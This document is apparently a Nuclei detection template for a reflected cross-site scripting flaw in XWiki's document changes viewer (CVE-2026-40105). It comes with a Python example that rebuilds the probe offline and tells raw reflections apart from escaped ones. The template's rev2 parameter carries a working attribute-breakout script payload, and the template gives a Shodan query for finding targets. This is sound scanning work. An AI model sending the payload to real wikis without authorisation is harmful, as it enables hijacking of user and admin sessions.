id: CVE-2026-40105

info:
  name: XWiki - Reflected Cross-Site Scripting (changes viewer)
  author: ritikchaddha
  severity: medium
  description: |
    XWiki is vulnerable to reflected cross-site scripting (XSS) in the document
    changes viewer (`viewer=changes`, rendered by templates/changesdoc.vm). The
    `rev2` request parameter is written into the HTML response without being
    escaped, so an attacker who lures a user to a crafted URL can execute
    arbitrary JavaScript in that user's browser session. Affects XWiki versions
    prior to the patched release.
  impact: |
    Attackers can execute JavaScript in users' browsers, potentially compromising
    admin accounts and, through them, the entire XWiki instance.
  remediation: |
    Update to a version later than 17.10.0 or apply the patch to
    templates/changesdoc.vm manually.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-w4fj-87j5-f25c
    - https://nvd.nist.gov/vuln/detail/CVE-2026-40105
    - https://jira.xwiki.org/browse/XWIKI-22481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-40105
    epss-score: 0.00737
    epss-percentile: 0.73163
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 2
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.title:"XWiki"
  tags: cve,cve2026,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Sandbox/?viewer=changes&rev1=9.1&rev2=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F17.6.0q1che%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Evfu80q44msz&form_token=test&language=en"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          # the payload injected through rev2 above, reflected verbatim
          - "<script>alert(document.domain)</script>"
          - "Changes for page"
          - "From version"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100caa7c69f1547ad277917750ced534c56da90fc21eb84efe76b276cb95dcffefd02201e2b7e264c2c2575c08c0437f1293dc4f694197089203fbd2e74c36de4f541a6:922c64590222798bb761d5b6d8e72950
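As an added example (not part of this template or of the XWiki project), the Python below reproduces the probe offline: it rebuilds the same request URL the template sends and classifies a response the way the matchers do, separating a verbatim reflection (exploitable) from an HTML-entity-escaped one (the behaviour expected once changesdoc.vm is patched, assumed here) and from a non-HTML response that a browser would not execute. The base URL `wiki.example` and the two response bodies are constructed for illustration, not captured from a real instance.

```python
"""Offline reproduction of the CVE-2026-40105 check (added example; not part of
the Nuclei template or of XWiki). The sample response bodies are constructed."""
import html
from urllib.parse import urlencode

# Payload the template injects through rev2 (decoded from the request path).
PAYLOAD = "<script>alert(document.domain)</script>"
# Context strings the template requires alongside the payload.
CONTEXT_WORDS = ("Changes for page", "From version")


def build_probe_url(base_url: str, payload: str = PAYLOAD) -> str:
    """Rebuild the template's GET request; base_url stands in for {{BaseURL}}.
    The quote and '>' in front of the payload close the attribute in which
    changesdoc.vm echoes rev2, so the script tag lands in element context."""
    rev2 = ("xar:org.xwiki.platform:xwiki-platform-distribution-flavor-common"
            f"/17.6.0q1che'>{payload}vfu80q44msz")
    query = urlencode({"viewer": "changes", "rev1": "9.1", "rev2": rev2,
                       "form_token": "test", "language": "en"})
    return f"{base_url.rstrip('/')}/bin/view/Sandbox/?{query}"


def classify_reflection(body: str, content_type: str, payload: str = PAYLOAD) -> str:
    """Classify how (and whether) the payload came back.

    'reflected-raw'     : payload present verbatim in an HTML body -> exploitable
    'reflected-escaped' : only the entity-encoded form is present -> escaped output
    'not-html'          : Content-Type is not text/html, so the browser will not
                          execute it even if it is reflected
    'not-reflected'     : payload absent
    """
    if "text/html" not in content_type.lower():
        return "not-html"
    if payload in body:
        return "reflected-raw"
    if html.escape(payload) in body:
        return "reflected-escaped"
    return "not-reflected"


def matches_template(body: str, content_type: str, status: int) -> bool:
    """Mirror the template's matchers (matchers-condition: and): raw payload plus
    both context strings in the body, a text/html Content-Type and HTTP 200."""
    return (status == 200
            and "text/html" in content_type
            and classify_reflection(body, content_type) == "reflected-raw"
            and all(word in body for word in CONTEXT_WORDS))


# Constructed responses standing in for a vulnerable and a fixed instance.
_DIFF_HEADER = ("<html><body><h1>Changes for page Sandbox</h1>"
                "<p>From version <a href='?rev=9.1'>9.1</a> to version ")
_REV2_PREFIX = ("<a href='?rev=xar:org.xwiki.platform:"
                "xwiki-platform-distribution-flavor-common/17.6.0q1che")
VULNERABLE_BODY = (_DIFF_HEADER + _REV2_PREFIX + "'>" + PAYLOAD
                   + "vfu80q44msz'>...</a></p></body></html>")
PATCHED_BODY = (_DIFF_HEADER + _REV2_PREFIX + "&#x27;&gt;" + html.escape(PAYLOAD)
                + "vfu80q44msz'>...</a></p></body></html>")

if __name__ == "__main__":
    print(build_probe_url("https://wiki.example"))
    for label, body in (("vulnerable", VULNERABLE_BODY), ("patched", PATCHED_BODY)):
        ctype = "text/html; charset=utf-8"
        print(label, classify_reflection(body, ctype), matches_template(body, ctype, 200))
```

The three-way classification is the caveat worth keeping in a real scanner: a response that echoes `&lt;script&gt;` is evidence the parameter is escaped, not that the instance is vulnerable, and a reflection in a non-HTML content type never reaches a script engine, so a word match on the raw payload alone would over-report.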